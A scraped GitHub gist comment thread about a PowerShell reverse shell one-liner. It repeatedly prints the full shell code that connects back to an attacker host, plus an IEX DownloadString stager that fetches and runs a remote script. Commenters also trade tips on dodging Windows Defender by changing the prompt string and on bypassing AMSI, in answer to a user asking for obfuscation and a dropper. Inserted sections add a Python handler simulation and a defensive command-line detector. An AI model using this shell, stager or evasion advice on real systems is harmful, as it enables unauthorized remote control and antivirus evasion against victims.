
 2 years ago
source link: https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3


powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok

The error message says that running PowerShell scripts on your machine is disabled, so you will have to enable PowerShell scripts via the PowerShell execution policy. Please follow the instructions in: https://www.tenforums.com/tutorials/54585-change-powershell-script-execution-policy-windows-10-a.html Next time, if you Google the error message you may find solutions; otherwise you can contact the owner of the script or anyone in the community.

On Sat, Jul 25, 2020, 9:51 AM Vedant Bhalgama wrote:

Ok, but can we obfuscate this script? And when I run the script it says this.

[image: Capture] <https://user-images.githubusercontent.com/67494275/88453135-187ae900-ce82-11ea-9e78-8ca0bfe73ef4.PNG>


Yes it is working now! But how to obfuscate it?

You may use base64, but a simple antivirus on the target system will discover it and block the connection after it kills the PowerShell process. So better you study obfuscation and do some tests on your local machine with advanced programming, even for persistence. Good luck.


Thanks Mate!

And where can I scan the results of a .ps1 file? It doesn't work on antiscan.me, and nodistribute also doesn't work.

If you want to build a reverse shell backdoor you must work with other languages like C#, C, Python, ... PowerShell is easy to spot when it has a backdoor. Or you can use virustotal(.)com, but use a localhost IP, not your DNS reverse.


The download string doesn't work like that; you are trying to create a dropper, which is used by blackhat hackers. I hope you are not using this illegally.

On Sat, Jul 25, 2020, 3:29 PM Vedant Bhalgama wrote:

Hi! I tried to run the code and I got a connection, but when I type any command the connection exits. On the PowerShell side I have output like this:

[image: Capture] <https://user-images.githubusercontent.com/67494275/88459081-27789000-ceb0-11ea-9961-893cf049371d.PNG> [image: Capture] <https://user-images.githubusercontent.com/67494275/88459213-49264700-ceb1-11ea-9e7a-cd06ef19c38f.PNG>

Also I am sharing the code which downloads the reverse shell .ps1 from the Kali server and executes it: powershell -c "IEX(New-Object System.Net.WebClient).DownloadString(' http://10.0.2.4/mypowershell.ps1');mypowershell.ps1"


Also, it ran the first time, but the second time it was detected.

Author

egre55 commented on Jul 25, 2020

try this: powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.0.2.4:443/mypowershell.ps1')" @Vedant-Bhalgama

with your reverse shell looking like:

$client = New-Object System.Net.Sockets.TCPClient("10.0.2.4",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

you should get a shell on your Netcat listener on port 80
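How the loop in the one-liner above behaves on the wire, as an added example that is not code from the gist or from anyone in this thread. The victim side re-implements the PowerShell loop's semantics in Python (one Read() chunk is decoded as ASCII, executed, and answered with the output followed by the prompt) without executing anything: outputs come from a constructed table. The handler side shows what a scripted listener has to do that plain Netcat does not: frame each reply on the trailing prompt string. The prompt path, host names and outputs are constructed. The bufsize=3 run forces the failure mode a practitioner should know about: Read() hands back whatever bytes have arrived, so a command split across two TCP segments is executed as two commands and the handler's replies are then desynchronised from its commands.

```python
"""Offline model of the one-liner's loop plus a scripted attacker-side handler.

Added example, not code from the gist or its comments. victim_loop() mirrors
the PowerShell while-loop; fake_iex() stands in for `iex` and answers from a
constructed table, so nothing is really executed.
"""
import socket
import threading

# The one-liner's prompt is "PS " + (pwd).Path + "> "; this path is constructed.
PROMPT = "PS C:\\Users\\victim> "

# Constructed stand-ins for command output.
FAKE_OUTPUT = {
    "whoami": "desktop-1\\victim\r\n",
    "hostname": "DESKTOP-1\r\n",
}


def fake_iex(cmd: str) -> str:
    """Stand-in for `iex $data 2>&1 | Out-String`.

    Unknown input gets a line shaped like PowerShell's "not recognized"
    error (shortened), which is what the real loop sends back for garbage.
    """
    if cmd in FAKE_OUTPUT:
        return FAKE_OUTPUT[cmd]
    return f"{cmd} : The term '{cmd}' is not recognized as the name of a cmdlet.\r\n"


def victim_loop(sock: socket.socket, prompt: str = PROMPT, bufsize: int = 65535) -> None:
    """Mirror of the PowerShell while-loop.

    Each Read() returns whatever bytes the stack has (at most bufsize, 65535
    in the one-liner) and that chunk is executed as one command. A command
    that arrives in two segments is therefore run as two commands; bufsize=3
    forces that case deterministically.
    """
    try:
        while True:
            data = sock.recv(bufsize)            # $stream.Read($bytes, 0, $bytes.Length)
            if not data:                         # Read returned 0 -> loop ends, $client.Close()
                break
            # ASCIIEncoding.GetString turns non-ASCII bytes into '?'
            cmd = data.decode("ascii", errors="replace").replace("\ufffd", "?")
            reply = fake_iex(cmd.strip()) + prompt          # $sendback + "PS ...> "
            sock.sendall(reply.encode("ascii", errors="replace"))
    except OSError:
        pass                                     # peer went away mid-write
    finally:
        sock.close()


class Handler:
    """Attacker side: send one command, collect bytes until the prompt appears."""

    def __init__(self, sock: socket.socket, prompt: str = PROMPT):
        self.sock = sock
        self.prompt = prompt.encode("ascii")
        self.buf = b""

    def run(self, cmd: str) -> str:
        self.sock.sendall(cmd.encode("ascii"))
        while self.prompt not in self.buf:
            chunk = self.sock.recv(4096)
            if not chunk:
                raise ConnectionError("victim closed the connection")
            self.buf += chunk
        reply, _, self.buf = self.buf.partition(self.prompt)   # keep any surplus for next time
        return reply.decode("ascii")


def exchange(commands, bufsize: int = 65535, prompt: str = PROMPT):
    """Run commands over an in-process socket pair and return the replies."""
    attacker, victim = socket.socketpair()
    worker = threading.Thread(target=victim_loop, args=(victim, prompt, bufsize), daemon=True)
    worker.start()
    handler = Handler(attacker, prompt)
    try:
        return [handler.run(c) for c in commands]
    finally:
        attacker.close()
        worker.join(timeout=5)


if __name__ == "__main__":
    print(exchange(["whoami", "hostname"]))
    print(exchange(["whoami", "hostname"], bufsize=3))   # replies are for "who" and "ami"
```

Because the handler frames on the prompt, swapping "PS " + (pwd).Path + "> " for any other fixed string (as done later in this thread) costs the operator nothing, but a stdout line that happens to end in the same text would be mistaken for the prompt.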

In order to compile a payload you must be compatible with the language you build the payload with.


Author

egre55 commented on Jul 25, 2020

if you want to evade Defender, you can replace "PS " + (pwd).Path + "> " with "#"

You'd better learn more about sockets and back-connects, and more obfuscation in PS. Good luck.


Yes! I am not using it for non-ethical purposes, bro! I am an ethical hacker and need this for pentesting purposes!

Ethical! OK.


The script is running now but it gives a detection error.
@egre55, what were you telling me to replace to evade Defender? Can you make the changes in the code?

[image: Capture]

epicn1337 commented on Aug 21, 2020

edited

One way or the other this script can be a disaster; this is the best way I run such a script: make sure you add powershell -nop -c followed by:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attackerIP',attackerPORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Which listener can be used for this? NetCat?

It got detected as MaliciousContent. Anything else? Should I try obfuscation?

After executing it in PowerShell with the IP and port changed, it shows "new object exception calling ctor with 2 argument(s): connection attempt failed". What should I do? I am not a PowerShell expert.
I run the netcat server in VirtualBox.

Windows 10 has PowerShell scripts disabled as a security defence.

On Tue, Nov 10, 2020 at 7:02 AM XZE3N wrote:

Hey, I wonder if I could get any help. I started playing around with this and it works amazingly on Win 7, but when I try to run it on a Win 10 machine I get this error. I'm not sure if you can get around this. I'm using Windows Defender on this machine. [image: Screenshot (116)] <https://user-images.githubusercontent.com/63551886/98640855-764d1700-2333-11eb-8add-b469513bba0f.png>


munteanulc commented on Jan 11, 2021

edited

The Windows Defender action is triggered by the "(pwd).Path" call in the code. Try running the following:
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.100',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PSReverseShell# ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}$client.Close();"
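The detection side of the evasion discussed in this comment, as an added example that is not code from the gist or from anyone in the thread: a small triage script over constructed process command-line events (the shape of Sysmon Event ID 1 or Security 4688 data) that weights the structural parts of the shell (TCPClient, GetStream, iex, DownloadString) above the prompt string, so the 'PSReverseShell# ' variant still scores, and that base64-decodes a -EncodedCommand argument (UTF-16LE script text) before scanning. Indicator weights, the threshold, the host names and the benign admin command line are this example's own choices; the one-liner and the stager text are reused from the thread.

```python
"""Triage of process command lines for the reverse-shell and stager patterns in this thread.

Added example, not from the gist. The indicator list and weights are this
example's own choices, not a vendor signature; the sample events are
constructed, reusing the thread's one-liner and stager text.
"""
import base64
import re

# (name, regex, weight). Structural pieces of the shell score high; the prompt
# strings score low because, as the thread shows, they are trivially changed.
INDICATORS = [
    ("tcpclient",      r"System\.Net\.Sockets\.TCPClient", 3),
    ("getstream",      r"\.GetStream\(\)", 2),
    ("iex",            r"\b(iex|Invoke-Expression)\b", 2),
    ("downloadstring", r"\.DownloadString\(", 3),
    ("ascii_encoding", r"ASCIIEncoding|\[text\.encoding\]::ASCII", 1),
    ("noprofile",      r"(?<![\w-])-nop(rofile)?\b", 1),
    ("hidden_window",  r"(?<![\w-])-w(indowstyle)?\s+hidden\b", 1),
    ("pwd_prompt",     r"\(pwd\)\.Path", 1),       # the string this comment says Defender keys on
    ("custom_prompt",  r"PSReverseShell#", 1),     # the replacement prompt from this comment
]
# -e / -ec / -enc / -EncodedCommand followed by base64 text (prefix forms PowerShell accepts)
ENCODED_ARG = re.compile(r"(?<![\w-])-e(c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
THRESHOLD = 5   # this example's cut-off


def decode_encoded_command(cmdline: str):
    """-EncodedCommand carries base64 of the UTF-16LE script text; return it, or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_cmdline(cmdline: str):
    """Return (score, hit names); an encoded payload is decoded and scanned as well."""
    hits, score, text = [], 0, cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.append("encoded")
        score += 2
        text = cmdline + "\n" + decoded
    for name, pattern, weight in INDICATORS:
        if re.search(pattern, text, re.I):
            hits.append(name)
            score += weight
    return score, hits


def triage(events):
    """Events at or above THRESHOLD as (host, score, hits), highest score first."""
    flagged = []
    for ev in events:
        score, hits = score_cmdline(ev["cmdline"])
        if score >= THRESHOLD:
            flagged.append((ev["host"], score, hits))
    return sorted(flagged, key=lambda f: -f[1])


# The one-liner from this comment (no "(pwd).Path") and the stager from egre55's reply.
ONE_LINER = (
    "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.100',4443);"
    "$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};"
    "while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;"
    "$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);"
    "$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PSReverseShell# ';"
    "$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);"
    "$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}$client.Close();"
)
STAGER = "IEX(New-Object System.Net.WebClient).DownloadString('http://10.0.2.4:443/mypowershell.ps1')"

# Constructed events; host names and the benign admin job are made up.
SAMPLE_EVENTS = [
    {"host": "WS01", "cmdline": 'powershell -c "' + ONE_LINER + '"'},
    {"host": "WS02", "cmdline": "powershell -nop -w hidden -enc "
        + base64.b64encode(ONE_LINER.encode("utf-16-le")).decode("ascii")},
    {"host": "WS03", "cmdline": 'powershell -c "' + STAGER + '"'},
    {"host": "WS04", "cmdline": "powershell -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"},
]

if __name__ == "__main__":
    for host, score, hits in triage(SAMPLE_EVENTS):
        print(host, score, hits)
```

The prompt-string indicators are kept only as corroboration; the point of the weighting is that removing "(pwd).Path" changes nothing about the TCPClient/GetStream/iex skeleton, which is what a detection should key on.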

Hi, kindly check my fork.

Just a small change to the way commands are run, to ensure any non-stdout text is sent back (except for confirmation prompts).

Without this, due to the way the output of a command run by Invoke-Expression is handled, stderr output never gets sent back even with '2>&1' specified in your current format.

Thanks,

Very nice :)

I tried to run it silently with -WindowsStyle Hidden -NoLog but it is not working. How can I run it silently?

Re: munteanulc's command above (with 'PSReverseShell# ' as the prompt): this actually still works and doesn't trigger anything.

Hi, can someone explain how exactly this works? Why does (pwd).Path trigger the antivirus? And is this reverse shell only available until a restart of the victim's PC? I didn't find any explanation online. Thanks in advance.

Good job!
It was detected by AMSI, but I ran an AMSI bypass script before running this script, so this script runs successfully!

mappl3 commented on Feb 1

Looks like the shell did not return stderr; is it possible to return stderr as well?

Author

egre55 commented on Feb 1

edited

hey @mappl3, feel free to add this in your fork and I'll update it ;). You can also append 2>&1 to the end of a command to get stderr.


